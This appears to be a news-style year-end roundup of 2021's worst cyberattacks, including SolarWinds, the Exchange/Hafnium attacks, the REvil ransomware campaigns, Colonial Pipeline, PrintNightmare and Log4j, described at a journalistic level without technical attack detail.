Cybersecurity practitioners rang in 2021 while fighting fires in the aftermath of the massive SolarWinds hack. And now, with many predicting we won’t know the full scope of the Log4j vulnerability and subsequent cyberattacks for months or even years, it looks like we’ll be in for a similar 2022.
But before we start speculating on how bad the bugs are going to get next year, let’s take a look back at some of the worst cyberattacks of 2021. While it’s been a doozy of a past 12 months, and there were plenty of attacks and vulnerabilities that we could have included on this list, here’s our highly subjective review of 2021’s worst.
SolarWindsYes, we’re cheating a little bit with the timeline on this one because Mandiant first discovered the breach in December 2020. The SolarWinds CEO would later say that an internal investigation revealed that Russian state-sponsored attackers hacked the software provider’s network as early as January 2019. But we didn’t know that in January 2021. At the time security analysts and policy makers were just beginning to realize that the breach was “much worse” than many originally feared.
After the attackers broke into SolarWinds, they inserted malware into the vendor’s Orion software update that was pushed to about 18,000 customers beginning in March 2019. This allowed them to remain in organizations’ environments for months without being detected. Threat researchers now believe the Russian attackers compromised about 100 private corporations in the United States and nine federal agencies’ networks.
Microsoft ExchangeWith U.S. companies and government agencies still reeling from the SolarWinds attacks, Chinese hacking group Hafnium found vulnerabilities in Microsoft Exchange that gave them access to the email accounts of at least 30,000 organizations in the U.S. and 250,000 globally.
“Historically, Hafnium primarily targets entities in the United States for the purpose of exfiltrating information from a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs,” Microsoft’s Tom Burt, corporate VP for customer security and trust, wrote in a March blog post.
Soon after Microsoft disclosed the bugs and started fixing the email server vulnerabilities, at least 10 other advanced persistent threat groups began exploiting the security flaws for coin mining and espionage.
A month later, the FBI hacked hundreds of computers in the U.S. running compromised versions of Microsoft Exchange software and removed malicious web shells in response to the Chinese state-sponsored attack.
REvil Demands $50M RansomIn April, Russian ransomware-as-a-service gang REvil hit Apple supplier Quanta with a $50 million ransomware attack.
IBM X-Force estimates that REvil made at least $123 million in profits in 2020 and stole around 21.6 terabytes of data.
The timing of the April attack proved significant. It happened just days before reports surfaced that the Justice Department formed a ransomware task force and about a week before U.S. Department of Homeland Security Secretary Alejandro Mayorkas said the Biden administration would soon release a plan to combat ransomware.
So did REvil’s double-extortion tactics. The ransomware group originally demanded Quanta pay the ransom to regain access to encrypted data. But after breaching that company’s networks and stealing Apple’s future product designs, REvil quickly pivoted and demanded Apple pay the $50 million or else it would leak even more stolen blueprints for the yet-to-be-released devices.
Colonial PipelineA month later, criminal group DarkSide breached Colonial Pipeline’s systems and shut down a major fuel supply for the East Coast. Colonial Pipeline’s CEO ultimately authorized a $4.4 million ransom payment to restore the systems.
The Colonial Pipeline breach is significant — and scary — because it moved cybercrime closer industrial targets and critical infrastructure attacks. DarkSide used compromised VPN credentials to access Colonial Pipeline’s IT system, not the operational technology (OT) control system that could shut down the physical fuel pipelines.
However, “if they use VPN credentials that are compromised from an IT network, then in the future there’s nothing to prevent that same thing from happening directly to an OT network, and it’s very hard to detect that,” said Patton Adams, strategic cyberthreat intelligence lead at Accenture, during a cyber threat landscape trends session at Black Hat.
KaseyaJust months after extorting $11 million from meat processor JBS during a Memorial Day ransomware attack, REvil demanded $70 million from Kaseya, marking the largest ransom demand to date.
The attack, which hit late on a Friday ahead of the Fourth of July holiday weekend, had two parts. First, the criminals exploited a zero-day vulnerability in Kaseya VSA software. This gave them privileged access to VSA servers, which they then used to deploy REvil ransomware across multiple managed service providers (MSPs) that use the IT management software and demand a $70 million payment.
Kaseya estimated the attack hit “fewer than 60” of its customers. However, because most of these were MSPs, the total number of affected organizations is likely between 800 and 1,500. These included New Zealand schools, a Swedish grocery store chain, and hundreds of other small and midsized businesses.
Microsoft’s (Print)Nightmare ContinuesMicrosoft in July disclosed yet another critical Windows bug dubbed Print Nightmare, which affects the Windows Print Spooler and allows multiple users to access a connected printer. Successfully exploiting this vulnerability allows hackers to view or delete data, install programs, or create new user accounts. Windows 7 and Windows 10 were both affected by this bug, and Microsoft recommended that its users install an out-of-band security update to avoid attacks.
Log4jAnd now, dear reader, we’ve reached the present and the already-infamous Log4j — a zero-day vulnerability in the popular Apache Log4j open source logging library that’s used in nearly every enterprise app and service from vendors including Microsoft, Twitter, VMware, Amazon, and Apple, among others.
Shortly after Apache disclosed the remote code execution vulnerability (CVE-2021-44228) on Dec. 9 and released a patch, threat researchers and the U.S. Cybersecurity and Infrastructure Security Agency sounded the alarm that attackers were already exploiting the security flaw, which received a perfect 10 out of 10 severity score.
As of Dec. 20, Check Point reported that its threat researchers had seen an attempted exploit of more than 48% of corporate networks globally.
Wiz, the cloud security startup that discovered the Microsoft Cosmos DB vulnerability earlier this year, said more than 89% of all IT environments have vulnerable Log4j libraries.
Initially Microsoft warned that attackers were mass scanning the internet for vulnerable systems and using Log4j to install coin miners, Cobalt Strike to enable credential theft and lateral movement, and steal data. But ransomware gangs soon followed, and security practitioners warn it will be months before we know the full extent of the damage.
“Every organization out there is going to have some exposure to this most likely,” Matt Olney, director of Talos threat intelligence said during a Cisco livestream event. “Very few will escape.”
The Next OneDo I feel like I’m jinxing the remaining days of the year by simply writing this article? Absolutely. So consider this the equivalent of knocking on wood. I hope we ride out the rest of 2021 without any major cyberattacks. But I’m not going to bet on it.